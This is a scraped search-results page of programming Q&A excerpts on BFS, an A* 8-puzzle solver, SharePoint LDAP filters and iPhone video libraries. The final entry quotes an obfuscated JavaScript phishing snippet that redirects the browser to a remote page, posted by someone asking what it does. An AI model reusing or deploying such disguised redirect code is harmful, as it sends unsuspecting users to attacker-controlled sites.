Search Results

Search found 37 results on 2 pages for 'gn'.

Page 1/2 | 1 2  | Next Page >

  • Setting up a software access point on Gigabyte GN-WPKG x64

    - by Reckage
    I'm using a Gigabyte GN-WPKG card on Windows 7 64-bit and was thinking it would be good to turn it into a wireless AP (I have a wired internet connection). Connectify, which would normally be the solution, says it's not compatible. There are instructions for setting up an AP, but they seem to be for 32-bit. I found the equivalent drivers for 7 and they don't seem to do anything. Is there no SoftAP for Vista and later on a Gigabyte card?

    Read the article

  • Finding all the shortest paths between two nodes in unweighted directed graphs using BFS algorithm

    - by andra-isan
    Hi All, I am working on a problem that I need to find all the shortest path between two nodes in a given directed unweighted graph. I have used BFS algorithm to do the job, but unfortunately I can only print one shortest path not all of them, for example if they are 4 paths having lenght 3, my algorithm only prints the first one but I would like it to print all the four shortest paths. I was wondering in the following code, how should I change it so that all the shortest paths between two nodes could be printed out? class graphNode{ public: int id; string name; bool status; double weight;}; map<int, map<int,graphNode>* > graph; int Graph::BFS(graphNode &v, graphNode &w){ queue <int> q; map <int, int> map1; // this is to check if the node has been visited or not. std::string str= ""; map<int,int> inQ; // just to check that we do not insert the same iterm twice in the queue map <int, map<int, graphNode>* >::iterator pos; pos = graph.find(v.id); if(pos == graph.end()) { cout << v.id << " does not exists in the graph " <<endl; return 1; } int parents[graph.size()+1]; // this vector keeps track of the parents for the node parents[v.id] = -1; // there is a direct path between these two words, simply print that path as the shortest path if (findDirectEdge(v.id,w.id) == 1 ){ cout << " Shortest Path: " << v.id << " -> " << w.id << endl; return 1; } //if else{ int gn; map <int, map<int, graphNode>* >::iterator pos; q.push(v.id); inQ.insert(make_pair(v.id, v.id)); while (!q.empty()){ gn = q.front(); q.pop(); map<int, int>::iterator it; cout << " Popping: " << gn <<endl; map1.insert(make_pair(gn,gn)); //backtracing to print all the nodes if gn is the same as our target node such as w.id if (gn == w.id){ int current = w.id; cout << current << " - > "; while (current!=v.id){ current = parents[current]; cout << current << " -> "; } cout <<endl; } if ((pos = graph.find(gn)) == graph.end()) { cout << " pos is empty " <<endl; continue; } map<int, graphNode>* pn = pos->second; map<int, graphNode>::iterator p = pn->begin(); while(p != pn->end()) { map<int, int>::iterator it; //map1 keeps track of the visited nodes it = map1.find(p->first); graphNode gn1= p->second; if (it== map1.end()) { map<int, int>::iterator it1; //if the node already exits in the inQ, we do not insert it twice it1 = inQ.find(p->first); if (it1== inQ.end()){ parents[p->first] = gn; cout << " inserting " << p->first << " into the queue " <<endl; q.push(p->first); // add it to the queue } //if } //if p++; } //while } //while } I do appreciate all your great help Thanks, Andra

    Read the article

  • 8-Puzzle Solution executes infinitely [migrated]

    - by Ashwin
    I am looking for a solution to 8-puzzle problem using the A* Algorithm. I found this project on the internet. Please see the files - proj1 and EightPuzzle. The proj1 contains the entry point for the program(the main() function) and EightPuzzle describes a particular state of the puzzle. Each state is an object of the 8-puzzle. I feel that there is nothing wrong in the logic. But it loops forever for these two inputs that I have tried : {8,2,7,5,1,6,3,0,4} and {3,1,6,8,4,5,7,2,0}. Both of them are valid input states. What is wrong with the code? Note For better viewing copy the code in a Notepad++ or some other text editor(which has the capability to recognize java source file) because there are lot of comments in the code. Since A* requires a heuristic, they have provided the option of using manhattan distance and a heuristic that calculates the number of misplaced tiles. And to ensure that the best heuristic is executed first, they have implemented a PriorityQueue. The compareTo() function is implemented in the EightPuzzle class. The input to the program can be changed by changing the value of p1d in the main() function of proj1 class. The reason I am telling that there exists solution for the two my above inputs is because the applet here solves them. Please ensure that you select 8-puzzle from teh options in the applet. EDITI gave this input {0,5,7,6,8,1,2,4,3}. It took about 10 seconds and gave a result with 26 moves. But the applet gave a result with 24 moves in 0.0001 seconds with A*. For quick reference I have pasted the the two classes without the comments : EightPuzzle import java.util.*; public class EightPuzzle implements Comparable <Object> { int[] puzzle = new int[9]; int h_n= 0; int hueristic_type = 0; int g_n = 0; int f_n = 0; EightPuzzle parent = null; public EightPuzzle(int[] p, int h_type, int cost) { this.puzzle = p; this.hueristic_type = h_type; this.h_n = (h_type == 1) ? h1(p) : h2(p); this.g_n = cost; this.f_n = h_n + g_n; } public int getF_n() { return f_n; } public void setParent(EightPuzzle input) { this.parent = input; } public EightPuzzle getParent() { return this.parent; } public int inversions() { /* * Definition: For any other configuration besides the goal, * whenever a tile with a greater number on it precedes a * tile with a smaller number, the two tiles are said to be inverted */ int inversion = 0; for(int i = 0; i < this.puzzle.length; i++ ) { for(int j = 0; j < i; j++) { if(this.puzzle[i] != 0 && this.puzzle[j] != 0) { if(this.puzzle[i] < this.puzzle[j]) inversion++; } } } return inversion; } public int h1(int[] list) // h1 = the number of misplaced tiles { int gn = 0; for(int i = 0; i < list.length; i++) { if(list[i] != i && list[i] != 0) gn++; } return gn; } public LinkedList<EightPuzzle> getChildren() { LinkedList<EightPuzzle> children = new LinkedList<EightPuzzle>(); int loc = 0; int temparray[] = new int[this.puzzle.length]; EightPuzzle rightP, upP, downP, leftP; while(this.puzzle[loc] != 0) { loc++; } if(loc % 3 == 0){ temparray = this.puzzle.clone(); temparray[loc] = temparray[loc + 1]; temparray[loc + 1] = 0; rightP = new EightPuzzle(temparray, this.hueristic_type, this.g_n + 1); rightP.setParent(this); children.add(rightP); }else if(loc % 3 == 1){ //add one child swaps with right temparray = this.puzzle.clone(); temparray[loc] = temparray[loc + 1]; temparray[loc + 1] = 0; rightP = new EightPuzzle(temparray, this.hueristic_type, this.g_n + 1); rightP.setParent(this); children.add(rightP); //add one child swaps with left temparray = this.puzzle.clone(); temparray[loc] = temparray[loc - 1]; temparray[loc - 1] = 0; leftP = new EightPuzzle(temparray, this.hueristic_type, this.g_n + 1); leftP.setParent(this); children.add(leftP); }else if(loc % 3 == 2){ // add one child swaps with left temparray = this.puzzle.clone(); temparray[loc] = temparray[loc - 1]; temparray[loc - 1] = 0; leftP = new EightPuzzle(temparray, this.hueristic_type, this.g_n + 1); leftP.setParent(this); children.add(leftP); } if(loc / 3 == 0){ //add one child swaps with lower temparray = this.puzzle.clone(); temparray[loc] = temparray[loc + 3]; temparray[loc + 3] = 0; downP = new EightPuzzle(temparray, this.hueristic_type, this.g_n + 1); downP.setParent(this); children.add(downP); }else if(loc / 3 == 1 ){ //add one child, swap with upper temparray = this.puzzle.clone(); temparray[loc] = temparray[loc - 3]; temparray[loc - 3] = 0; upP = new EightPuzzle(temparray, this.hueristic_type, this.g_n + 1); upP.setParent(this); children.add(upP); //add one child, swap with lower temparray = this.puzzle.clone(); temparray[loc] = temparray[loc + 3]; temparray[loc + 3] = 0; downP = new EightPuzzle(temparray, this.hueristic_type, this.g_n + 1); downP.setParent(this); children.add(downP); }else if (loc / 3 == 2 ){ //add one child, swap with upper temparray = this.puzzle.clone(); temparray[loc] = temparray[loc - 3]; temparray[loc - 3] = 0; upP = new EightPuzzle(temparray, this.hueristic_type, this.g_n + 1); upP.setParent(this); children.add(upP); } return children; } public int h2(int[] list) // h2 = the sum of the distances of the tiles from their goal positions // for each item find its goal position // calculate how many positions it needs to move to get into that position { int gn = 0; int row = 0; int col = 0; for(int i = 0; i < list.length; i++) { if(list[i] != 0) { row = list[i] / 3; col = list[i] % 3; row = Math.abs(row - (i / 3)); col = Math.abs(col - (i % 3)); gn += row; gn += col; } } return gn; } public String toString() { String x = ""; for(int i = 0; i < this.puzzle.length; i++){ x += puzzle[i] + " "; if((i + 1) % 3 == 0) x += "\n"; } return x; } public int compareTo(Object input) { if (this.f_n < ((EightPuzzle) input).getF_n()) return -1; else if (this.f_n > ((EightPuzzle) input).getF_n()) return 1; return 0; } public boolean equals(EightPuzzle test){ if(this.f_n != test.getF_n()) return false; for(int i = 0 ; i < this.puzzle.length; i++) { if(this.puzzle[i] != test.puzzle[i]) return false; } return true; } public boolean mapEquals(EightPuzzle test){ for(int i = 0 ; i < this.puzzle.length; i++) { if(this.puzzle[i] != test.puzzle[i]) return false; } return true; } } proj1 import java.util.*; public class proj1 { /** * @param args */ public static void main(String[] args) { int[] p1d = {1, 4, 2, 3, 0, 5, 6, 7, 8}; int hueristic = 2; EightPuzzle start = new EightPuzzle(p1d, hueristic, 0); int[] win = { 0, 1, 2, 3, 4, 5, 6, 7, 8}; EightPuzzle goal = new EightPuzzle(win, hueristic, 0); astar(start, goal); } public static void astar(EightPuzzle start, EightPuzzle goal) { if(start.inversions() % 2 == 1) { System.out.println("Unsolvable"); return; } // function A*(start,goal) // closedset := the empty set // The set of nodes already evaluated. LinkedList<EightPuzzle> closedset = new LinkedList<EightPuzzle>(); // openset := set containing the initial node // The set of tentative nodes to be evaluated. priority queue PriorityQueue<EightPuzzle> openset = new PriorityQueue<EightPuzzle>(); openset.add(start); while(openset.size() > 0){ // x := the node in openset having the lowest f_score[] value EightPuzzle x = openset.peek(); // if x = goal if(x.mapEquals(goal)) { // return reconstruct_path(came_from, came_from[goal]) Stack<EightPuzzle> toDisplay = reconstruct(x); System.out.println("Printing solution... "); System.out.println(start.toString()); print(toDisplay); return; } // remove x from openset // add x to closedset closedset.add(openset.poll()); LinkedList <EightPuzzle> neighbor = x.getChildren(); // foreach y in neighbor_nodes(x) while(neighbor.size() > 0) { EightPuzzle y = neighbor.removeFirst(); // if y in closedset if(closedset.contains(y)){ // continue continue; } // tentative_g_score := g_score[x] + dist_between(x,y) // // if y not in openset if(!closedset.contains(y)){ // add y to openset openset.add(y); // } // } // } } public static void print(Stack<EightPuzzle> x) { while(!x.isEmpty()) { EightPuzzle temp = x.pop(); System.out.println(temp.toString()); } } public static Stack<EightPuzzle> reconstruct(EightPuzzle winner) { Stack<EightPuzzle> correctOutput = new Stack<EightPuzzle>(); while(winner.getParent() != null) { correctOutput.add(winner); winner = winner.getParent(); } return correctOutput; } }

    Read the article

  • Finding a person in the forest

    - by PointsToShare
    © 2011 By: Dov Trietsch. All rights reserved finding a person in the forest or Limiting the AD result in SharePoint People Picker There are times when we need to limit the SharePoint audience of certain farms or servers or site collections to a particular audience. One of my experiences involved limiting access to US citizens, another to a particular location. Now, most of us – your humble servant included – are not Active Directory experts – but we must be able to handle the “audience restrictions” as required. So here is how it’s done in a nutshell. Important note. Not all could be done in PowerShell (at least not yet)! There are no Windows PowerShell commands to configure People Picker. The stsadm command is: stsadm -o setproperty -pn peoplepicker-searchadcustomquery -pv ADQuery –url http://somethingOrOther Note the long-hyphenated property name. Now to filling the ADQuery.   LDAP Query in a nutshell Syntax LDAP is no older than SQL and an LDAP query is actually a query against the LDAP Database. LDAP attributes are the equivalent of Database columns, so why do we have to learn a new query language? Beats me! But we must, so here it is. The syntax of an LDAP query string is made of individual statements with relational operators including: = Equal <= Lower than or equal >= Greater than or equal… and memberOf – a group membership. ! Not * Wildcard Equal and memberOf are the most commonly used. Checking for absence uses the ! – not and the * - wildcard Example: (SN=Grant) All whose last name – SurName – is Grant Example: (!(SN=Grant)) All except Grant Example: (!(SN=*)) all where there is no SurName i.e SurName is absent (probably Rappers). Example: (CN=MyGroup) Common Name is MyGroup.  Example: (GN=J*) all the Given Names that start with J (JJ, Jane, Jon, John, etc.) The cryptic SN, CN, GN, etc. are attributes and more about them later All the queries are enclosed in parentheses (Query). Complex queries are comprised of sets that are in AND or OR conditions. AND is denoted by the ampersand (&) and the OR is denoted by the vertical pipe (|). The general syntax is that of the Prefix polish notation where the operand precedes the variables. E.g +ab is the sum of a and b. In an LDAP query (&(A)(B)) will garner the objects for which both A and B are true. In an LDAP query (&(A)(B)(C)) will garner the objects for which A, B and C are true. There’s no limit to the number of conditions. In an LDAP query (|(A)(B)) will garner the objects for which either A or B are true. In an LDAP query (|(A)(B)(C)) will garner the objects for which at least one of A, B and C is true. There’s no limit to the number of conditions. More complex queries have both types of conditions and the parentheses determine the order of operations. Attributes Now let’s get into the SN, CN, GN, and other attributes of the query SN – is the SurName (last name) GN – is the Given Name (first name) CN – is the Common Name, usually GN followed by SN OU – is an Organization Unit such as division, department etc. DC – is a Domain Content in the AD forest l – lower case ‘L’ stands for location. Jerusalem anybody? Or Katmandu. UPN – User Principal Name, is usually the first part of an email address. By nature it is unique in the forest. Most systems set the UPN to be the first initial followed by the SN of the person involved. Some limit the total to 8 characters. If we have many ‘jsmith’ we have to somehow distinguish them from each other. DN – is the distinguished name – a name unique to AD forest in which it lives. Usually it’s a CN with some domain or group distinguishers. DN is important in conjunction with the memberOf relation. Groups have stricter requirement. Each group has to have a unique name - its CN and it has to be unique regardless of its place. See more below. All of the attributes are case insensitive. CN, cn, Cn, and cN are identical. objectCategory is an element that requires special consideration. AD contains many different object like computers, printers, and of course people and groups. In the queries below, we’re limiting our search to people (person). Putting it altogether Let’s get a list of all the Johns in the SPAdmin group of the Jerusalem that local domain. (&(objectCategory=person)(memberOf=cn=SPAdmin,ou=Jerusalem,dc=local)) The memberOf=cn=SPAdmin uses the cn (Common Name) of the SPAdmin group. This is how the memberOf relation is used. ‘SPAdmin’ is actually the DN of the group. Also the memberOf relation does not allow wild cards (*) in the group name. Also, you are limited to at most one ‘OU’ entry. Let’s add Marvin Minsky to the search above. |(&(objectCategory=person)(memberOf=cn=SPAdmin,ou=Jerusalem,dc=local))(CN=Marvin Minsky) Here I added the or pipeline at the beginning of the query and put the CN requirement for Minsky at the end. Note that if Marvin was already in the prior result, he’s not going to be listed twice. One last note: You may see a dryer but more complete list of attributes rules and examples in: http://www.tek-tips.com/faqs.cfm?fid=5667 And finally (thus negating the claim that my previous note was last), to the best of my knowledge there are 3 more ways to limit the audience. One is to use the peoplepicker-searchadcustomfilter property using the same ADQuery. This works only in SP1 and above. The second is to limit the search to users within this particular site collection – the property name is peoplepicker-onlysearchwithinsitecollection and the value is yes (-pv yes) And the third is –pn peoplepicker-serviceaccountdirectorypaths –pv “OU=ou1,DC=dc1…..” Again you are limited to at most one ‘OU’ phrase – no OU=ou1,OU=ou2… And now the real end. The main property discussed in this sprawling and seemingly endless monogram – peoplepicker-searchadcustomquery - is the most general way of getting the job done. Here are a few examples of command lines that worked and some that didn’t. Can you see why? C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\12\BIN>stsa dm -o setproperty -url http://somethingOrOther -pn peoplepicker-searchadcustomfi lter -pv (Title=David) Operation completed successfully. C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\12\BIN>stsa dm -o setproperty -url http://somethingOrOther -pn peoplepicker-searchadcustomfi lter -pv (!Title=David) Operation completed successfully. C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\12\BIN>stsa dm -o setproperty -url http://somethingOrOther -pn peoplepicker-searchadcustomfi lter -pv (OU=OURealName,OU=OUMid,OU=OUTop,DC=TopDC,DC=MidDC,DC=BottomDC) Command line error. Too many OUs C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\12\BIN>stsa dm -o setproperty -url http://somethingOrOther -pn peoplepicker-searchadcustomfi lter -pv (OU=OURealName) Operation completed successfully. C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\12\BIN>stsa dm -o setproperty -url http://somethingOrOther -pn peoplepicker-searchadcustomfi lter -pv (DC=TopDC,DC=MidDC,DC=BottomDC) Operation completed successfully. C:\Program Files\Common Files\Microsoft Shared\Web Server Extensions\12\BIN>stsa dm -o setproperty -url http://somethingOrOther -pn peoplepicker-searchadcustomfi lter -pv (OU=OURealName,DC=TopDC,DC=MidDC,DC=BottomDC) Operation completed successfully.   That’s all folks!

    Read the article

  • Video Recording on iPhone

    - by gn-mithun
    I have this iPhone app, which plays streaming video from a source(Just video, no audio). Is there any mechanism by which i can capture this streaming video or record them, for later playback?

    Read the article

  • FFmpeg on iPhone

    - by gn-mithun
    Hello, I have downloaded ffmpeg libraries for iPhone and compiled them. My objective is to create a movie file from a series of images using ffmpeg libraries.The amount of documentation for ffmpeg on iphone is very less. I checked an app called iFrameExtractor, which does the opposite of what i want, it extracts frames from a video. On the command line there is a command called ffmpeg -f image2 -i image%d.jpg video.mov This turns a series of images into a video. I actually checked it on my mac and it works fine. What i wanted to know was how do we get the equivalent in iPhone. Or rather which class/api or method to call. There are a couple of examples of apps doing this on iPhone. Not sure whether they do it through ffmpeg though. Anyways, for reference "Time lapser" and "reel moments" Thanks in advance

    Read the article

  • OpenCV and iPhone

    - by gn-mithun
    Hello, I am writing an application to create a movie file from a bunch of images on an iPhone. I am using OpenCv. I downloaded openCv static libraries for arm(iPhones native instruction architecture) and the libraries were generated just fine. There were no problems linking to them libraries. As a first step, i was trying to create a .avi file using one image, to see if it works. But cvCreateVideoWriter always returns me a NULL value. I did some searchin and i believe its due to the codec not being present. I am trying this on the iPhone simulator. this is what i do... (void)viewDidLoad { [super viewDidLoad]; UIImage *anImage = [UIImage imageNamed:@"1.jpg"]; IplImage *img_color = [self CreateIplImageFromUIImage:anImage]; //The image gets created just fine CvVideoWriter *writer = cvCreateVideoWriter("out.avi",CV_FOURCC('P','I','M','1'), 25,cvSize(320,480),1); //writer is always null int result = cvWriteFrame(writer, img_color); NSLog(@"\n%d",result); //hence this is also 0 all the time cvReleaseVideoWriter(&writer); } I am not sure about the the second parameter. What sort of codec or what exactly it does... I am a n00B in this. Any suggestions?

    Read the article

  • iPhone and OpenCV

    - by gn-mithun
    Hello, I am writing an application to create a movie file from a bunch of images on an iPhone. I am using OpenCv. I downloaded openCv static libraries for arm(iPhones native instruction architecture) and the libraries were generated just fine. There were no problems linking to them libraries. As a first step, i was trying to create a .avi file using one image, to see if it works. But cvCreateVideoWriter always returns me a NULL value. I did some searchin and i believe its due to the codec not being present. I am trying this on the iPhone simulator. this is what i do... (void)viewDidLoad { [super viewDidLoad]; UIImage *anImage = [UIImage imageNamed:@"1.jpg"]; IplImage *img_color = [self CreateIplImageFromUIImage:anImage]; //The image gets created just fine CvVideoWriter *writer = cvCreateVideoWriter("out.avi",CV_FOURCC('P','I','M','1'), 25,cvSize(320,480),1); //writer is always null int result = cvWriteFrame(writer, img_color); NSLog(@"\n%d",result); //hence this is also 0 all the time cvReleaseVideoWriter(&writer); } I am not sure about the the second parameter. What sort of codec or what exactly it does... I am a n00B in this. Any suggestions?

    Read the article

  • Ad hoc network between iPhone and non iPhone devices???

    - by gn-mithun
    Is it possible to set up a ad hoc network between an iPhone and a totally different device like camera,scanner or printer and build a data tunnel between them to exchange data or services. I believe iPhone does not have the provision of creating an ad hoc network. So i am assuming that the other device are the initiator of the ad hoc network. I tried doing the same with a mac book and iPhone and i could surf on the phone after enabling internet sharing. But i wanted to make sure that its possible with other devices as well I believe the upcoming WiFi Direct is a way to do it.

    Read the article

  • Current network being accessed

    - by gn-mithun
    Is there way i can get the current network being used by iPhone programmatically in an iPhone app. To SImplify, suppose there are 3 networks visible in the wifi vicinity of the phone and i can see them in the settings page. I select one and is it possible for any app to find that out?

    Read the article

  • How to repaint a form so that it does not disappear on minimizing?

    - by gn
    I have a form in which i paint a waveform on a button click that is as soon as i click button, the waveform displays. Now when i minimize the form and maximize it again, the waveform disappears.How to repaint it? I have seen people using paint event but i dont know how to use it after/inside the button click event. Please help.

    Read the article

  • Convert text to table

    - by Quattro
    I would like convert text into a table. Here is a link to the text http://www.tcdb.org/public/tcdb Short example: >gnl|TC-DB|A0CIB0|1.A.17.3.1 Chromosome undetermined scaffold_19, whole genome shotgun sequence OS=Paramecium tetraurelia GN=GSPATT00007662001 PE=4 SV=1 MDDQNQPILQEQPKPKQKKPLLNTKMVKKQKMQNKKEENLREILNFYTNQVDARKFLQKM KAVVDSNQQEKKYQDDFLNPNEYNEMQDIYEDYNMGDLVIVFPNPDADGVKNPPITYKEA PLTKTNFYSKIGNVSYENDIDELCVDEMEYLRNMRNVDGEHMDQDHVKEEI >gnl|TC-DB|A0CS82|9.B.82.1.5 Chromosome undetermined scaffold_26, whole genome shotgun sequence - Paramecium tetraurelia. MIIEEQIEEKMIYKAIHRVKVNYQKKIDRYILYKKSRWFFNLLLMLLYAYRIQNIGGFYI VTYIYCVYQLQLLIDYFTPLGLPPVNLEDEEEDDDQFQNDFSELPTTLSNKNELNDKEFR PLLRTTSEFKVWQKSVFSVIFAYFCTYIPIWDIPVYWPFLFCYFFVIVGMSIRKYIKHMK KYGYTILDFTKKK I wanted to have columns for example delimited with pipe | or ; |>gnl|TC-DB|A0CIB0|1.A.17.3.1| Chromosome undetermined scaffold_19, whole genome shotgun sequence OS=Paramecium tetraurelia GN=GSPATT00007662001 PE=4 SV=1| MDDQNQPILQEQPKPKQKKPLLNTKMVKKQKMQNKKEENLREILNFYTNQVDARKFLQKM KAVVDSNQQEKKYQDDFLNPNEYNEMQDIYEDYNMGDLVIVFPNPDADGVKNPPITYKEA PLTKTNFYSKIGNVSYENDIDELCVDEMEYLRNMRNVDGEHMDQDHVKEEI I am working with Windows and I don't know how to do it I just know every row starts with > I want to substitute the first whitespace in a row with a delimiter like | or ; after the first regular expression new line in a row, I want also a delimiter everything between the regular expression first new line and > should go into a new column (it's a sequence of a protein)

    Read the article

  • subscribing an event to a class object before initializing it.

    - by GN
    I have two classes class A and B.I have a delegate n event published in class B.The class B object is declared in class A.All he functionality dependes on the parameterised constru ctor of class B. Before initializing the object of class B i need to subscibe the event for it.how to do it? e.g public class B { public delegate void myDel(string); public event myDel myEvent; B(object obj) { ----------------- ------------------ } } class A { A objA; class XYZ objXYZ; void func() { objA.myEvent+=new myDel(); objA=new A(objXYZ); // hw to attain this? } }

    Read the article

  • Excel Macro to concatenate

    - by Harish
    Need help in creating an Excel Macro.I have an Excel sheet.The Excel sheet is not consistent. I am planning to make it uniform and structured. Eg. A B C D 1 test tester tester 2 hai test 3 Bye test tested 4 GN test tested Fine A B C D 1 test testertester 2 hai test 3 Bye testtested 4 GN testtestedFine Basically I have to find the last cell where element is placed so based on that I can write my CONCATENATE funciton. In this case it would be Column D and hence my concatenate function would have been =CONCATENATE(B1,C1,D1) Again I would like the result to be in B1 but not a problem if I have to hide. Can anyone help me in doing this?

    Read the article

  • Help catching AV with WinDbg and ADPlus 7.0

    - by Stoune
    I want to catch Memory Access Violation in SQL Server Compact Edition like this described at http://debuggingblog.com/wp/2009/02/18/memory-access-violation-in-sql-server-compact-editionce/ The suggested config is: CRASH Quiet MyApp.exe NoDumpOnFirstChance clr;av FullDump gn I download latest Debugging Tools and observe what Microsoft rewrite adplus tool into managed code and change syntax of config File. I rewrite config file like this: <ADPlus Version="2"> <Settings> <RunMode>Crash</RunMode> <Option>Quiet</Option> <Option>NoDumpOnFirst</Option> <Sympath>c:\symbols\</Sympath> <OutputDir>c:\work\output\</OutputDir> <ProcessName>c:\work\app\output\MyApp.exe</ProcessName> </Settings> <Exceptions><!--to get the full dump on clr access violation--> <Exception Code="clr;av"> <Actions1>FullDump</Actions1> <ReturnAction1>gn</ReturnAction1> </Exception> </Exceptions> </ADPlus> And I get error "Couldn't find exception with code: clr;av". If I understand right It didn't load sos extension, but I can't find the right section and syntax that I should use to load it. adplus_old.vbs - for some reasons didn't launch process on Windows 7. WinDBG 6.12.0002.633 X86 ADPlus Engine Version: 7.01.002 02/27/2009 Maybe someone has a working example of config of debugging .NET app with latest adplus.exe?

    Read the article

  • merge() multiple data frames (do.call ?)

    - by Vincent
    Hi everyone, here's my very simple question: merge() only takes two data frames as input. I need to merge a series of data frames from a list, using the same keys for every merge operation. Given a list named "test", I want to do something like: do.call("merge", test). I could write some kind of loop, but I'm wondering if there's a standard or built-in way to do this more efficiently. Any advice is appreciated. Thanks! Here's a subset of the dataset in dput format (note that merging on country is trivial in this case, but that there are more countries in the original data): test <- list(structure(list(country = c("United States", "United States", "United States", "United States", "United States"), NY.GNS.ICTR.GN.ZS = c(13.5054687, 14.7608697, 14.1115876, 13.3389063, 12.9048351), year = c(2007, 2006, 2005, 2004, 2003)), .Names = c("country", "NY.GNS.ICTR.GN.ZS", "year"), row.names = c(NA, 5L), class = "data.frame"), structure(list( country = c("United States", "United States", "United States", "United States", "United States"), NE.TRD.GNFS.ZS = c(29.3459277, 28.352838, 26.9861939, 25.6231246, 23.6615328), year = c(2007, 2006, 2005, 2004, 2003)), .Names = c("country", "NE.TRD.GNFS.ZS", "year"), row.names = c(NA, 5L), class = "data.frame"), structure(list( country = c("United States", "United States", "United States", "United States", "United States"), NY.GDP.MKTP.CD = c(1.37416e+13, 1.31165e+13, 1.23641e+13, 1.16309e+13, 1.0908e+13), year = c(2007, 2006, 2005, 2004, 2003)), .Names = c("country", "NY.GDP.MKTP.CD", "year"), row.names = c(NA, 5L), class = "data.frame"))

    Read the article

  • How to convert a fixed height/width-fixed layout to elastic?

    - by phretor
    I used the same software used here http://us.gn.bartal.org/ to create a fixed width/height treemap in HTML + CSS. I would like to make it elastic by having a JavaScript function to convert all pixels absolute positions and sizes to percentages. How would you suggest to proceed? Is there some jQuery/Prototype/Dojo magic that I can exploit?

    Read the article

  • how to connect only ethernet and only wireless hosts together

    - by Ashok Das
    Here is my problem. I have an android tablet that have only WiFi for network connectivity and I have a windows server that have only Ethernet ports for network connection. Now I want to telnet to my server from my tablet. I think some wireless to Ethernet converter required in between. I am planning to use Buffalo Air Station WCR-GN or TP-LINK TL-WR740N or TL-WR702N. The connection setup should be like this: [server]<---Ethernet---[WIFI router]<---wireless---[Tablet]. Now I am in doubt will this setup work? Anybody please help me with this. Regards Ashok

    Read the article

  • SQL SERVER – DMV sys.dm_exec_describe_first_result_set_for_object – Describes the First Result Metadata for the Module

    - by pinaldave
    Here is another interesting follow up blog post of SQL SERVER – sp_describe_first_result_set New System Stored Procedure in SQL Server 2012. While I was writing earlier blog post I had come across DMV sys.dm_exec_describe_first_result_set_for_object as well. I found that SQL Server 2012 is providing all this quick and new features which quite often we miss  to learn it and when in future someone demonstrates the same to us, we express our surprise on the subject. DMV sys.dm_exec_describe_first_result_set_for_object returns result set which describes the columns used in the stored procedure. Here is the quick example. Let us first create stored procedure. USE [AdventureWorks] GO ALTER PROCEDURE [dbo].[CompSP] AS SELECT [DepartmentID] id ,[Name] n ,[GroupName] gn FROM [HumanResources].[Department] GO Now let us run following two DMV which gives us meta data description of the stored procedure passed as a parameter. Option1: Pass second parameter @include_browse_information as a 0. SELECT * FROM sys.dm_exec_describe_first_result_set_for_object ( OBJECT_ID('[dbo].[CompSP]'),0) AS Table1 GO Option2: Pass second parameter @include_browse_information as a 1. SELECT * FROM sys.dm_exec_describe_first_result_set_for_object ( OBJECT_ID('[dbo].[CompSP]'),1) AS Table1 GO Here is the result of Option1 and Option2. If you see the result, there is absolutely no difference between the results. Both of the resultset are returning column names which are aliased in the stored procedure. Let us scroll on the right side and you will notice that there is clear difference in some columns. You will see in second resultset source_database, Source_schema as well few other columns are reporting original table instead of NULL values. When @include_browse_information result is set to 1 it will provide the columns details of the underlying table. I have just discovered this DMV, I have yet to use it in production code and find out where exactly I will use this DMV. Do you have any idea? Does any thing comes up to your mind where this DMV can be helpful. Reference: Pinal Dave (http://blog.sqlauthority.com) Filed under: PostADay, SQL, SQL Authority, SQL DMV, SQL Query, SQL Server, SQL Tips and Tricks, T SQL, Technology

    Read the article

  • IIM Calcutta &ndash; EPBM 14 &ndash; Campus Visit &ndash; Day 2 &ndash; IS_Strategy and Internationa

    - by Ram Shankar Yadav
    Hey Guys~ So the second day of the week starts, and we were all set for coming sessions on : - IS & Strategy and, - Changing Geo-politics & Business Environment We did our daily chores, rushed for breakfast, and reached Auditorioum, almost on time. IS & Strategy session was quite informative and interactive, and the prof. gave lot of examples, and it really gives us solid understanding by relating things with examples. Then goes the lunch, but the IS session over shoot for 15 minutes so our idea of taking a nap in lunch was not working out, but anyway we did our lunch and tried to sleep for 10-15 minutes. We got back and session on International Business started. Frankly, it’s a great topic, but we had tough time to be attentive, and it was hard to keep ourselves awake :P Anyhow the session came to an end, and we went to Library, and roamed around campus. Got back, had dinner, and went for a night walk, and ice-cream party. Lastly we did went to the platform inside the lake, and had a gag session, got back and  did “ITC eChaupal” case study. We have planned to visit Kali Mandir tomorrow, so I’ve to sleep for few hours…GN! Stay tuned for more… ram :)

    Read the article

  • What does this suspicious phishing code do?

    - by halohunter
    A few of my non-IT coworkers opened a .html attachment in an email message that looks extremely suspicious. It resulted in a blank screen when it appears that some javascript code was run. <script type='text/javascript'>function uK(){};var kV='';uK.prototype = {f : function() {d=4906;var w=function(){};var u=new Date();var hK=function(){};var h='hXtHt9pH:9/H/Hl^e9n9dXe!r^mXeXd!i!a^.^c^oHm^/!iHmHaXg!e9sH/^zX.!hXt9m^'.replace(/[\^H\!9X]/g, '');var n=new Array();var e=function(){};var eJ='';t=document['lDo6cDart>iro6nD'.replace(/[Dr\]6\>]/g, '')];this.nH=false;eX=2280;dF="dF";var hN=function(){return 'hN'};this.g=6633;var a='';dK="";function x(b){var aF=new Array();this.q='';var hKB=false;var uN="";b['hIrBeTf.'.replace(/[\.BTAI]/g, '')]=h;this.qO=15083;uR='';var hB=new Date();s="s";}var dI=46541;gN=55114;this.c="c";nT="";this.bG=false;var m=new Date();var fJ=49510;x(t);this.y="";bL='';var k=new Date();var mE=function(){};}};var l=22739;var tL=new uK(); var p="";tL.f();this.kY=false;</script> What did it do? It's beyond the scope of my programming knowledge.

    Read the article

1 2  | Next Page >